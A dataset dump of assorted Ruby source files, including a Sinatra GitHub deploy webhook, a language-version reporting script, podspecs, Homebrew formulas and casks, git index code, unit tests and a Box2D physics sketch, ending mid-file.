hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
91606ffbfd343361909ad1e2cd3f4469996a688b | 1,471 | require "sinatra"
require "json"
configure do
set(:deploy_config) { JSON.parse(File.read("config.json")) }
end
post '/deploy' do
body = request.body.read
payload = JSON.parse(body)
repo_name = payload["repository"]["full_name"]
halt 404, "Unknown repository" unless settings.deploy_config.has_key? repo_name
verify_signature(body, settings.deploy_config[repo_name]["secret"])
case request.env['HTTP_X_GITHUB_EVENT']
when 'pull_request'
if payload["action"].eql? "closed" && payload["pull_request"]["merged"]
deploy repo_name
puts "Done with pull"
end
when 'push'
if payload["ref"].eql? settings.deploy_config[repo_name]["ref"]
deploy repo_name
puts "Done with push"
end
else
halt 400, "Bad Event."
end
end
def verify_signature(payload_body, token)
signature = 'sha1=' + OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), token, payload_body)
halt 403, "Failed to verify signature!" unless Rack::Utils.secure_compare(signature, request.env['HTTP_X_HUB_SIGNATURE'])
end
def deploy(repo_name)
pre_pull_script = settings.deploy_config[repo_name]["pre_pull_script"]
pull_script = settings.deploy_config[repo_name]["pull_script"]
post_pull_script = settings.deploy_config[repo_name]["post_pull_script"]
system("bash #{pre_pull_script}")
system("bash #{pull_script}")
system("bash #{post_pull_script}")
end
| 33.431818 | 125 | 0.687967 |
18831ee179e17ac7b50026177cf26a32c6566080 | 499 | cask 'gramps' do
version '5.0.2-3'
sha256 '28e5f457d37f8b4ad738874b92a9edbfb1e92f4d44abc1229f42579b1aa233f1'
# github.com/gramps-project/gramps was verified as official when first introduced to the cask
url "https://github.com/gramps-project/gramps/releases/download/v#{version.major_minor_patch}/Gramps-Intel-#{version}.dmg"
appcast 'https://github.com/gramps-project/gramps/releases.atom'
name 'Gramps'
homepage 'https://gramps-project.org/introduction-WP/'
app 'Gramps.app'
end
| 38.384615 | 124 | 0.777555 |
e898bcdd63d8fff0aac37c9a8234aeb066bc2adb | 4,520 | #!/usr/bin/env ruby
# frozen_string_literal: true
require 'fileutils'
require 'json'
BUILD_DIR = 'build'
def dotnet_base_path
info = `dotnet --info`
info.match(/Base Path:\s+(.*)\s*/)[1]
end
def cat(filename, content = nil)
name = File.join(BUILD_DIR, filename)
unless content.nil?
File.open(name, 'w') do |f|
f.puts content
end
end
name
end
LANGS = {
'Rust' => -> { `rustc --version`.split[1] },
'Vala' => -> { `vala --version`.split[1] },
'D/ldc2' => lambda do
line = `ldc2 -v -X -Xf=#{cat('ldc.json')} -Xi=compilerInfo`.split("\n")[1]
line.match(/version\s+(.*)\s+\(/)[1]
end,
'Swift' => -> { `swift --version`.split("\n")[0].match(/\((.*)\)/)[1] },
'MLton' => -> { `mlton`.split[1] },
'F#/.NET Core' => lambda do
fsharpc = File.join(dotnet_base_path, 'FSharp', 'fsc.dll')
`dotnet #{fsharpc} --help | sed -n 1p`.match(/version\s(.*)/)[1]
end,
'gcc/g++' => -> { `gcc -dumpfullversion` },
'Go/gccgo' => -> { `gccgo -dumpfullversion` },
'D/gdc' => -> { `gdc -dumpfullversion` },
'Nim' => lambda do
`nim c --verbosity:0 --hint[Processing]:off \
-r #{cat('nim.nim', 'echo NimVersion')}`
end,
'Crystal' => -> { `crystal eval "puts Crystal::VERSION"` },
'Go' => lambda do
prog = <<~GO
package main
import (
"fmt"
"runtime"
)
func main() {
fmt.Printf(runtime.Version())
}
GO
`go run #{cat('go.go', prog)}`
end,
'D/dmd' => lambda do
json = `dmd -X -Xf=#{cat('dmd.json')} -Xi=compilerInfo \
&& cat #{cat('dmd.json')}`
JSON.parse(json)['compilerInfo']['version']
end,
'clang/clang++' => lambda do
prog = <<~CLANG
#include <stdio.h>
int main(void) {
printf(__clang_version__);
return 0;
}
CLANG
`clang -o #{cat('clang')} #{cat('clang.c', prog)} && ./#{cat('clang')}`
end,
'Scala' => -> { `scala -version 2>&1`.split[4] },
'Node.js' => -> { `node -e "console.log(process.version)"` },
'Python' => lambda do
`python3 -c "import platform;print(platform.python_version())"`
end,
'Python/pypy' => lambda do
prog = <<~PYPY
import platform, sys
pypy = "%d.%d.%d-%s%d" % sys.pypy_version_info
print("%s for Python %s" % (pypy, platform.python_version()))
PYPY
`pypy3 #{cat('pypy.py', prog)}`
end,
'Ruby' => -> { `ruby -e 'puts "#{RUBY_VERSION}p#{RUBY_PATCHLEVEL}"'` },
'Ruby/jruby' => -> { `jruby -e 'puts JRUBY_VERSION'` },
'Ruby/truffleruby' => -> { `truffleruby -e 'puts RUBY_ENGINE_VERSION'` },
'Java' => lambda do
prog = <<~JAVA
class Test {
public static void main(String[] argv) {
System.out.print(System.getProperty("java.version"));
}
}
JAVA
`java #{cat('java.java', prog)}`
end,
'Julia' => -> { `julia -E 'VERSION'` },
'C#/Mono' => -> { `mono --version=number` },
'.NET Core' => -> { `dotnet --version` },
'C#/.NET Core' => lambda do
csc = File.join(dotnet_base_path, 'Roslyn', 'bincore', 'csc.dll')
`dotnet #{csc} -version`
end,
'Perl' => -> { `perl -e 'print $^V;'` },
'Haskell' => -> { `ghc --numeric-version` },
'Tcl' => -> { `echo 'puts "$tcl_version"' | tclsh` },
# TODO: remove JAVA_OPTS as soon as new Kotlin is released
# (see https://youtrack.jetbrains.com/issue/KT-43704)
'Kotlin' => lambda do
`JAVA_OPTS="--illegal-access=permit" kotlin -e KotlinVersion.CURRENT`
end,
'PHP' => -> { `php -r "echo phpversion();"` },
'Elixir' => -> { `elixir -e "IO.puts System.version"` },
'Lua' => -> { `lua -e "print(_VERSION)"` },
'Lua/luajit' => -> { `luajit -e "print(jit.version)"` },
'OCaml' => -> { `ocaml -vnum` },
'Racket' => -> { `racket -e "(version)"` },
'Chez Scheme' => -> { `scheme --version 2>&1` },
'V' => -> { `v version`.split[1, 2].join(' ') },
'Clojure' => -> { `clojure -M -e '(clojure-version)'` },
'Zig' => -> { `zig version` }
}.freeze
def pad(num, str, padstr)
str.strip.ljust(num, padstr)
end
def lpad(str, padstr = ' ')
pad(16, str, padstr)
end
def rpad(str, padstr = ' ')
pad(31, str, padstr)
end
def versions
table = [
"| #{lpad('Language')} | #{rpad('Version')} |",
"| #{lpad('-', '-')} | #{rpad('-', '-')} |"
]
LANGS.sort.each do |name, version_lambda|
warn "Fetching #{name} version..."
version = version_lambda.call
table << "| #{lpad(name)} | #{rpad(version)} |"
end
table.join("\n")
end
FileUtils.mkdir_p BUILD_DIR
puts versions
warn "\n"
FileUtils.rm_r BUILD_DIR
| 28.974359 | 78 | 0.543805 |
7a112bf770f10329f8f5dde432313090fa78b0f2 | 727 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-media-picker"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://git.realestate.com.au/react-native/react-native-media-picker.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,swift,xib,storyboard}"
s.resource_bundles = {
'MediaPicker' => ['ios/Localization/**/*.strings', 'ios/Module/**/*.storyboard']
}
s.dependency "React-Core"
end
| 30.291667 | 129 | 0.607978 |
4ad740e4ad359206d2805a5f6554fe3cd1659a91 | 2,979 | Pod::Spec.new do |s|
s.name = "React"
s.version = "0.1.0"
s.summary = "Build high quality mobile apps using React."
s.description= <<-DESC
React Native apps are built using the React JS framework,
and render directly to native UIKit elements using a fully
asynchronous architecture. There is no browser and no HTML.
We have picked what we think is the best set of features from
these and other technologies to build what we hope to become
the best product development framework available, with an
emphasis on iteration speed, developer delight, continuity
of technology, and absolutely beautiful and fast products
with no compromises in quality or capability.
DESC
s.homepage = "http://facebook.github.io/react-native/"
s.license = "BSD"
s.author = "Facebook"
s.platform = :ios, "7.0"
s.source = { :git => "https://github.com/facebook/react-native.git", :tag => "v#{s.version}" }
s.source_files = "React/**/*.{c,h,m}"
s.resources = "Resources/*.png"
s.preserve_paths = "cli.js", "Libraries/**/*.js", "lint", "linter.js", "node_modules", "package.json", "packager", "PATENTS", "react-native-cli"
s.exclude_files = "**/__tests__/*", "IntegrationTests/*"
s.frameworks = "JavaScriptCore"
s.requires_arc = true
s.prepare_command = 'npm install'
s.libraries = 'icucore'
s.subspec 'RCTActionSheet' do |ss|
ss.source_files = "Libraries/ActionSheetIOS/*.{h,m}"
ss.preserve_paths = "Libraries/ActionSheetIOS/*.js"
end
s.subspec 'RCTAdSupport' do |ss|
ss.source_files = "Libraries/RCTAdSupport/*.{h,m}"
ss.preserve_paths = "Libraries/RCTAdSupport/*.js"
end
s.subspec 'RCTAnimation' do |ss|
ss.source_files = "Libraries/Animation/*.{h,m}"
ss.preserve_paths = "Libraries/Animation/*.js"
end
s.subspec 'RCTGeolocation' do |ss|
ss.source_files = "Libraries/Geolocation/*.{h,m}"
ss.preserve_paths = "Libraries/Geolocation/*.js"
end
s.subspec 'RCTImage' do |ss|
ss.source_files = "Libraries/Image/*.{h,m}"
ss.preserve_paths = "Libraries/Image/*.js"
end
s.subspec 'RCTNetwork' do |ss|
ss.source_files = "Libraries/Network/*.{h,m}"
ss.preserve_paths = "Libraries/Network/*.js"
end
s.subspec 'RCTPushNotification' do |ss|
ss.source_files = "Libraries/PushNotificationIOS/*.{h,m}"
ss.preserve_paths = "Libraries/PushNotificationIOS/*.js"
end
s.subspec 'RCTWebSocketDebugger' do |ss|
ss.source_files = "Libraries/RCTWebSocketDebugger/*.{h,m}"
end
s.subspec 'RCTText' do |ss|
ss.source_files = "Libraries/Text/*.{h,m}"
ss.preserve_paths = "Libraries/Text/*.js"
end
s.subspec 'RCTVibration' do |ss|
ss.source_files = "Libraries/Vibration/*.{h,m}"
ss.preserve_paths = "Libraries/Vibration/*.js"
end
end
| 37.708861 | 146 | 0.638469 |
626c8c85e0d3f4a16f66ad8d645a6fda92246875 | 1,541 | require 'yaml'
module LanguageList
class LanguageInfo
attr_reader :name, :iso_639_3, :iso_639_1, :type
def initialize(options)
@name = options[:name]
@iso_639_3 = options[:iso_639_3]
@iso_639_1 = options[:iso_639_1]
@common = options[:common]
@type = options[:type]
end
def common?
@common
end
def <=>(other)
self.name <=> other.name
end
def iso_639_1?
!@iso_639_1.nil?
end
[:ancient, :constructed, :extinct, :historical, :living, :special].each do |type|
define_method("#{type.to_s}?") do
@type == type
end
end
def to_s
"#{@iso_639_3}#{" (#{@iso_639_1})" if @iso_639_1} - #{@name}"
end
def self.find_by_iso_639_1(code)
LanguageList::ISO_639_1.detect{|l| l.iso_639_1 == code }
end
def self.find_by_iso_639_3(code)
LanguageList::ALL_LANGUAGES.detect{|l| l.iso_639_3 == code }
end
def self.find_by_name(name)
LanguageList::ALL_LANGUAGES.detect{|l| l.name == name }
end
def self.find(code)
find_by_iso_639_1(code) || find_by_iso_639_3(code) || find_by_name(code)
end
end
LANGUAGE_HASH = YAML.load_file(File.expand_path(File.join(File.dirname(__FILE__),'..', 'data', 'languages.yml')))
ALL_LANGUAGES = LANGUAGE_HASH.map{|e| LanguageInfo.new(e) }
ISO_639_1 = ALL_LANGUAGES.select(&:iso_639_1?)
LIVING_LANGUAGES = ALL_LANGUAGES.select(&:living?)
COMMON_LANGUAGES = ALL_LANGUAGES.select(&:common?)
end
| 25.683333 | 115 | 0.625568 |
ed4582aa6feeacb736b034b0ce867406e166df8a | 539 | cask "netgear-switch-discovery-tool" do
version "1.2.102"
sha256 "5d58479d3b32798fedefce7a4b6da220ced1bd20ed5d71ce1d3c04e097721da2"
url "https://www.downloads.netgear.com/files/GDC/NSDT/NetgearSDT-V#{version}-Mac.zip"
appcast "https://www.netgear.com/support/product/netgear-switch-discovery-tool.aspx#download"
name "NETGEAR Switch Discovery Tool"
homepage "https://www.netgear.com/support/download/"
container nested: "NetgearSDT-V#{version}-Mac/NetgearSDT-V#{version}.dmg"
app "NETGEAR Switch Discovery Tool.app"
end
| 38.5 | 95 | 0.779221 |
e9d992559ebad2bdff84b20f06f976f28183de1d | 1,730 | class Onedpl < Formula
desc "C++ standard library algorithms with support for execution policies"
homepage "https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/dpc-library.html"
url "https://github.com/oneapi-src/oneDPL/archive/refs/tags/oneDPL-2021.4.0-release.tar.gz"
sha256 "74ffc0fabd6a74af8c1a7a92f049794559bbe5afcd755398f1b130226f1b60fa"
# Apache License Version 2.0 with LLVM exceptions
license "Apache-2.0" => { with: "LLVM-exception" }
livecheck do
url :stable
regex(/^oneDPL[._-](\d+(?:\.\d+)+)(?:[._-]release)?$/i)
end
depends_on "cmake" => :build
depends_on "tbb"
# CMake: add install instructions
patch do
url "https://github.com/oneapi-src/oneDPL/commit/008dd241e4766bda87e439ebe64a0f91d795b181.patch?full_index=1"
sha256 "a7e588130b3016a609082b95352a716267ea49c316b7cf1977d010b241fcc0ef"
end
def install
cmake_args = std_cmake_args + %w[
-S .
-B build
]
system "cmake", *cmake_args
# `cmake --build build` is for tests
system "cmake", "--install", "build"
end
test do
tbb = Formula["tbb"]
(testpath/"test.cpp").write <<~EOS
#include <oneapi/dpl/execution>
#include <oneapi/dpl/algorithm>
#include <array>
#include <assert.h>
int main() {
std::array<int, 10> arr {{5,2,3,1,4,9,7,0,8,6}};
dpl::sort(dpl::execution::par_unseq, arr.begin(), arr.end());
for(int i=0; i<10; i++)
assert(i==arr.at(i));
return 0;
}
EOS
system ENV.cxx, "-std=c++11", "-L#{tbb.opt_lib}", "-ltbb", "-I#{tbb.opt_include}",
"-I#{prefix}/stdlib", "-I#{include}", "test.cpp", "-o", "test"
system "./test"
end
end
| 30.350877 | 113 | 0.633526 |
b91357db9839f8429a6f5b4a9790bec0da8e1bf2 | 3,474 | module Grit
class Index
attr_accessor :repo, :tree, :current_tree
def initialize(repo)
self.repo = repo
self.tree = {}
self.current_tree = nil
end
# Add a file to the index
# +path+ is the path (including filename)
# +data+ is the binary contents of the file
#
# Returns nothing
def add(file_path, data)
path = file_path.split('/')
filename = path.pop
current = self.tree
path.each do |dir|
current[dir] ||= {}
node = current[dir]
current = node
end
current[filename] = data
end
def read_tree(tree)
self.current_tree = self.repo.tree(tree)
end
# Commit the contents of the index
# +message+ is the commit message
#
# Returns a String of the SHA1 of the commit
def commit(message, parents = nil, actor = nil, last_tree = nil, head = 'master')
tree_sha1 = write_tree(self.tree, self.current_tree)
return false if tree_sha1 == last_tree # don't write identical commits
contents = []
contents << ['tree', tree_sha1].join(' ')
parents.each do |p|
contents << ['parent', p].join(' ') if p
end if parents
if actor
name = actor.name
email = actor.email
else
config = Config.new(self.repo)
name = config['user.name']
email = config['user.email']
end
author_string = "#{name} <#{email}> #{Time.now.to_i} -0700" # !! TODO : gotta fix this
contents << ['author', author_string].join(' ')
contents << ['committer', author_string].join(' ')
contents << ''
contents << message
commit_sha1 = self.repo.git.ruby_git.put_raw_object(contents.join("\n"), 'commit')
# self.repo.git.update_ref({}, 'HEAD', commit_sha1)
ref_heads = File.join(self.repo.path, 'refs', 'heads')
FileUtils.mkdir_p(ref_heads)
File.open(File.join(ref_heads, head), 'w') do |f|
f.write(commit_sha1)
end if commit_sha1
commit_sha1
end
# Recursively write a tree to the index
# +tree+ is the tree
#
# Returns the SHA1 String of the tree
def write_tree(tree, now_tree = nil)
tree_contents = {}
# fill in original tree
now_tree.contents.each do |obj|
sha = [obj.id].pack("H*")
k = obj.name
k += '/' if (obj.class == Grit::Tree)
tree_contents[k] = "%s %s\0%s" % [obj.mode.to_s, obj.name, sha]
end if now_tree
# overwrite with new tree contents
tree.each do |k, v|
case v
when String:
sha = write_blob(v)
sha = [sha].pack("H*")
str = "%s %s\0%s" % ['100644', k, sha]
tree_contents[k] = str
when Hash:
ctree = now_tree/k if now_tree
sha = write_tree(v, ctree)
sha = [sha].pack("H*")
str = "%s %s\0%s" % ['040000', k, sha]
tree_contents[k + '/'] = str
end
end
tr = tree_contents.sort.map { |k, v| v }.join('')
self.repo.git.ruby_git.put_raw_object(tr, 'tree')
end
# Write the blob to the index
# +data+ is the data to write
#
# Returns the SHA1 String of the blob
def write_blob(data)
self.repo.git.ruby_git.put_raw_object(data, 'blob')
end
end # Index
end # Grit
| 28.47541 | 94 | 0.543466 |
381f440f49eef08ff48ad28d89633be68fcac55c | 1,011 | require 'tmpdir'
require 'digest/md5'
require 'fileutils'
# Abstract
class Puppet::Provider::Vcsrepo < Puppet::Provider
private
def set_ownership
owner = @resource.value(:owner) || nil
group = @resource.value(:group) || nil
FileUtils.chown_R(owner, group, @resource.value(:path))
end
def path_exists?
File.directory?(@resource.value(:path))
end
def path_empty?
# Path is empty if the only entries are '.' and '..'
d = Dir.new(@resource.value(:path))
d.read # should return '.'
d.read # should return '..'
d.read.nil?
end
# Note: We don't rely on Dir.chdir's behavior of automatically returning the
# value of the last statement -- for easier stubbing.
def at_path(&block) #:nodoc:
value = nil
Dir.chdir(@resource.value(:path)) do
value = yield
end
value
end
def tempdir
@tempdir ||= File.join(Dir.tmpdir, 'vcsrepo-' + Digest::MD5.hexdigest(@resource.value(:path)))
end
end
| 23.511628 | 99 | 0.627102 |
d58953657680633ae711778838fcada38fa33af0 | 2,837 | require "assert"
require "undies/root_node"
require 'undies/io'
require 'undies/element'
require 'undies/element_node'
class Undies::RootNode
class UnitTests < Assert::Context
desc 'a root node'
before do
@io = Undies::IO.new(@out = "", :pp => 1)
@rn = Undies::RootNode.new(@io)
@e = Undies::Element::Closed.new(:br)
@en = Undies::ElementNode.new(@io, @e)
end
subject { @rn }
should have_readers :io, :cached
should have_instance_methods :attrs, :text, :element_node
should have_instance_methods :partial, :flush, :push, :pop
should "know its IO" do
assert_equal @io, subject.io
end
should "have nothing cached by default" do
assert_nil subject.cached
end
should "complain if trying to specify attrs" do
assert_raises Undies::RootAPIError do
subject.attrs({:blah => 'whatever'})
end
end
should "cache any raw text given" do
subject.text "some raw markup"
assert_equal "some raw markup#{@io.newline}", subject.cached
end
should "write out any cached value when new markup is given" do
subject.text "some raw markup"
assert_empty @out
subject.text "more raw markup"
assert_equal "some raw markup\n", @out
end
should "cache any element node given" do
subject.element_node(@en)
assert_equal @en, subject.cached
end
should "return the element when given" do
assert_equal @en, subject.element_node(@en)
end
should "write out any cached value when a new element is given" do
subject.element_node(@en)
assert_empty @out
subject.element_node(@en)
assert_equal "<br />#{@io.newline}", @out
end
should "cache any partial markup given" do
subject.partial "some partial markup"
assert_equal "some partial markup#{@io.newline}", subject.cached
end
should "write out any cached value when new partial markup is given" do
subject.partial "some partial markup"
assert_empty @out
subject.partial "more partial markup"
assert_equal "some partial markup\n", @out
end
should "write out any cached value when flushed" do
subject.flush
assert_empty @out
subject.text "some raw markup"
subject.flush
assert_equal "some raw markup\n", @out
end
should "only flush if popped" do
io_level = @io.level
subject.text "some raw markup"
subject.pop
assert_equal "some raw markup\n", @out
assert_equal io_level, @io.level
end
should "push the cached content to the IO handler" do
io_level = @io.level
subject.text "some raw markup"
subject.push
assert_equal io_level+1, @io.level
assert_equal "some raw markup#{@io.newline}", @io.current
end
end
end
| 25.790909 | 75 | 0.654565 |
282a99301f458e390b25a7d5a9cdfc59f4602b41 | 378 | require "hamster/list"
module Hamster
module CoreExt
module Enumerable
def self.included(base)
base.class_eval do
def to_list
list = EmptyList
reverse_each { |item| list = list.cons(item) }
list
end
end
end
end
end
end
module Enumerable
include Hamster::CoreExt::Enumerable
end
| 17.181818 | 58 | 0.587302 |
5d9133f0a933f992a6f22a61a8453f76c6609a5e | 2,158 | # -*- encoding: utf-8 -*-
# stub: commonmarker 0.17.13 ruby lib ext
# stub: ext/commonmarker/extconf.rb
Gem::Specification.new do |s|
s.name = "commonmarker".freeze
s.version = "0.17.13"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze, "ext".freeze]
s.authors = ["Garen Torikian".freeze, "Ashe Connor".freeze]
s.date = "2018-09-10"
s.description = "A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.".freeze
s.executables = ["commonmarker".freeze]
s.extensions = ["ext/commonmarker/extconf.rb".freeze]
s.files = ["bin/commonmarker".freeze, "ext/commonmarker/extconf.rb".freeze]
s.homepage = "http://github.com/gjtorikian/commonmarker".freeze
s.licenses = ["MIT".freeze]
s.rdoc_options = ["-x".freeze, "ext/commonmarker/cmark/.*".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0.0".freeze)
s.rubygems_version = "3.3.5".freeze
s.summary = "CommonMark parser and renderer. Written in C, wrapped in Ruby.".freeze
s.installed_by_version = "3.3.5" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.6"])
s.add_development_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.2"])
s.add_development_dependency(%q<json>.freeze, ["~> 1.8.1"])
s.add_development_dependency(%q<awesome_print>.freeze, [">= 0"])
s.add_development_dependency(%q<rdoc>.freeze, ["~> 5.1"])
else
s.add_dependency(%q<ruby-enum>.freeze, ["~> 0.5"])
s.add_dependency(%q<minitest>.freeze, ["~> 5.6"])
s.add_dependency(%q<rake-compiler>.freeze, ["~> 0.9"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.2"])
s.add_dependency(%q<json>.freeze, ["~> 1.8.1"])
s.add_dependency(%q<awesome_print>.freeze, [">= 0"])
s.add_dependency(%q<rdoc>.freeze, ["~> 5.1"])
end
end
| 44.958333 | 116 | 0.68304 |
3845753cd0e1929cfa39ad92a1c941625094f06d | 77 | # frozen_string_literal: true
module SolidusInvoice
VERSION = '0.1.1'
end
| 12.833333 | 29 | 0.753247 |
61e09f960f14560b2b01787551e92f38c4ea9d47 | 2,063 | # -*- encoding: utf-8 -*-
# stub: socket.io-client-simple 1.2.1 ruby lib
Gem::Specification.new do |s|
s.name = "socket.io-client-simple"
s.version = "1.2.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Sho Hashimoto"]
s.date = "2016-02-20"
s.description = "A simple ruby client for Node.js's Socket.IO v1.1.x, Supports only WebSocket."
s.email = ["[email protected]"]
s.homepage = "https://github.com/shokai/ruby-socket.io-client-simple"
s.licenses = ["MIT"]
s.rubygems_version = "2.4.8"
s.summary = "A simple ruby client for Node.js's Socket.IO v1.1.x, Supports only WebSocket."
s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<bundler>, ["~> 1.3"])
s.add_development_dependency(%q<rake>, [">= 0"])
s.add_development_dependency(%q<minitest>, [">= 0"])
s.add_runtime_dependency(%q<json>, [">= 0"])
s.add_runtime_dependency(%q<websocket-client-simple>, ["~> 0.3.0"])
s.add_runtime_dependency(%q<httparty>, [">= 0"])
s.add_runtime_dependency(%q<event_emitter>, [">= 0"])
else
s.add_dependency(%q<bundler>, ["~> 1.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<minitest>, [">= 0"])
s.add_dependency(%q<json>, [">= 0"])
s.add_dependency(%q<websocket-client-simple>, ["~> 0.3.0"])
s.add_dependency(%q<httparty>, [">= 0"])
s.add_dependency(%q<event_emitter>, [">= 0"])
end
else
s.add_dependency(%q<bundler>, ["~> 1.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<minitest>, [">= 0"])
s.add_dependency(%q<json>, [">= 0"])
s.add_dependency(%q<websocket-client-simple>, ["~> 0.3.0"])
s.add_dependency(%q<httparty>, [">= 0"])
s.add_dependency(%q<event_emitter>, [">= 0"])
end
end
| 40.45098 | 105 | 0.627242 |
39ede870d0977e1db52f297c172ae1eab98e8c85 | 535 | # frozen_string_literal: true
module EightBall::Conditions
# Finds the Condition class based on its name
# @param [String] name The case insensitive name to find the Condition for
# @return [EightBall::Conditions] the Condition class represented by the given name
def self.by_name(name)
mappings = {
always: EightBall::Conditions::Always,
list: EightBall::Conditions::List,
never: EightBall::Conditions::Never,
range: EightBall::Conditions::Range
}
mappings[name.downcase.to_sym]
end
end
| 31.470588 | 85 | 0.719626 |
28d991013b59c3cdd33b4a891c4ef55ab7e1928c | 785 | {
matrix_id: '1377',
name: 'rajat28',
group: 'Rajat',
description: 'Rajat/rajat28 circuit simulation matrix',
author: 'Rajat',
editor: 'T. Davis',
date: '2006',
kind: 'circuit simulation problem',
problem_2D_or_3D: '0',
num_rows: '87190',
num_cols: '87190',
nonzeros: '606489',
num_explicit_zeros: '746',
num_strongly_connected_components: '1178',
num_dmperm_blocks: '3495',
structural_full_rank: 'true',
structural_rank: '87190',
pattern_symmetry: '0.991',
numeric_symmetry: '0.107',
rb_type: 'real',
structure: 'unsymmetric',
cholesky_candidate: 'no',
positive_definite: 'no',
image_files: 'rajat28.png,rajat28_dmperm.png,rajat28_scc.png,rajat28_APlusAT_graph.gif,rajat28_graph.gif,',
}
| 29.074074 | 111 | 0.663694 |
e914a8f5d8221cc8166f528b8cccb70ae516c417 | 1,616 | class Sqldiff < Formula
desc "Displays the differences between SQLite databases"
homepage "https://www.sqlite.org/sqldiff.html"
url "https://www.sqlite.org/2021/sqlite-src-3360000.zip"
version "3.36.0"
sha256 "25a3b9d08066b3a9003f06a96b2a8d1348994c29cc912535401154501d875324"
license "blessing"
livecheck do
url "https://sqlite.org/index.html"
regex(%r{href=.*?releaselog/v?(\d+(?:[._]\d+)+)\.html}i)
strategy :page_match do |page, regex|
page.scan(regex).map { |match| match&.first&.gsub("_", ".") }
end
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "21de15f86c125a02389a2dca0a7d53dc3dd01dddd6bcc38ceb7d322597a093de"
sha256 cellar: :any_skip_relocation, big_sur: "90601ff9aed7b0638b959e765878f42e38430dead627adbb7d6b68530ecb0915"
sha256 cellar: :any_skip_relocation, catalina: "8ccda1604107c379c4072127825ac3a1c042ad03ccb8d6f763335403ca01790c"
sha256 cellar: :any_skip_relocation, mojave: "470d541de3685a5b7ba46a997e493e6a69faf1ff69d29b15dbbed0c1e10fd166"
end
uses_from_macos "tcl-tk" => :build
uses_from_macos "sqlite" => :test
def install
system "./configure", "--disable-debug", "--prefix=#{prefix}"
system "make", "sqldiff"
bin.install "sqldiff"
end
test do
dbpath = testpath/"test.sqlite"
sqlpath = testpath/"test.sql"
sqlpath.write "create table test (name text);"
system "sqlite3 #{dbpath} < #{sqlpath}"
assert_equal "test: 0 changes, 0 inserts, 0 deletes, 0 unchanged",
shell_output("#{bin}/sqldiff --summary #{dbpath} #{dbpath}").strip
end
end
| 38.47619 | 122 | 0.714728 |
268b7156f7c80ea48f3e5e6c6937c057a1a2f0de | 3,816 | # The Nature of Code
# PBox2D example
# An uneven surface boundary
class Surface
include Processing::Proxy
# We'll keep track of all of the surface points
attr_reader :surface, :body, :box2d, :y, :width, :height
def initialize(b2d)
@box2d = b2d
@surface = []
@width = b2d.width
@height = b2d.height
# This is what box2d uses to put the surface in its world
chain = ChainShape.new
# Perlin noise argument
xoff = 0.0
# This has to go backwards so that the objects bounce off the top of the surface
# This "edgechain" will only work in one direction!
(width + 10).step(-10, -5) do |x|
# Doing some stuff with perlin noise to calculate a surface that points down on one side
# and up on the other
@y = if x > width / 2
100 + (width - x) * 1.1 + map1d(noise(xoff), (-1.0..1.0), (-80..80))
else
100 + x * 1.1 + map1d(noise(xoff), (-1.0..1.0), (-80..80))
end
# Store the vertex in screen coordinates
surface << Vec2.new(x, y)
# Move through perlin noise
xoff += 0.1
end
# Build an array of vertices in Box2D coordinates
# from the ArrayList we made
vertices = []
surface.each do |surf|
vertices << box2d.processing_to_world(surf)
end
# Create the chain!
chain.createChain(vertices, vertices.length)
# The edge chain is now attached to a body via a fixture
bd = BodyDef.new
bd.position.set(0.0, 0.0)
@body = box2d.createBody(bd)
# Shortcut, we could define a fixture if we
# want to specify frictions, restitution, etc.
body.createFixture(chain, 1)
end
# A simple function to just draw the edge chain as a series of vertex points
def display
stroke_weight(2)
stroke(0)
fill(135, 206, 250)
begin_shape
vertex(width, 0) # extra vertices so we can fill sky
surface.each do |v|
vertex(v.x, v.y) # the mountain range
end
vertex(0, 0) # extra vertices so we can fill sky
end_shape
end
end
class Particle
include Processing::Proxy
# We need to keep track of a Body
attr_reader :body, :box2d, :x, :y, :r
# Constructor
def initialize(b2d, x, y, r)
@box2d = b2d
@x = x
@y = y
@r = r
# This function puts the particle in the Box2d world
make_body(x, y, r)
end
# This function removes the particle from the box2d world
def kill_body
box2d.destroy_body(body)
end
# Is the particle ready for deletion?
def done
pos = box2d.body_coord(body)
# Is it off the bottom of the screen?
return false unless pos.y > box2d.height + r * 2
kill_body
true
end
def display
# We look at each body and get its screen position
pos = box2d.body_coord(body)
# Get its angle of rotation
a = body.get_angle
push_matrix
translate(pos.x, pos.y)
rotate(-a)
fill(175)
stroke(0)
stroke_weight(1)
ellipse(0, 0, r * 2, r * 2)
# Let's add a line so we can see the rotation
line(0, 0, r, 0)
pop_matrix
end
# This function adds the rectangle to the box2d world
def make_body(x, y, r)
# Define and create the body
bd = BodyDef.new
bd.position = box2d.processing_to_world(x, y)
bd.type = BodyType::DYNAMIC
@body = box2d.create_body(bd)
# Make the body's shape a circle
cs = CircleShape.new
cs.m_radius = box2d.scale_to_world(r)
fd = FixtureDef.new
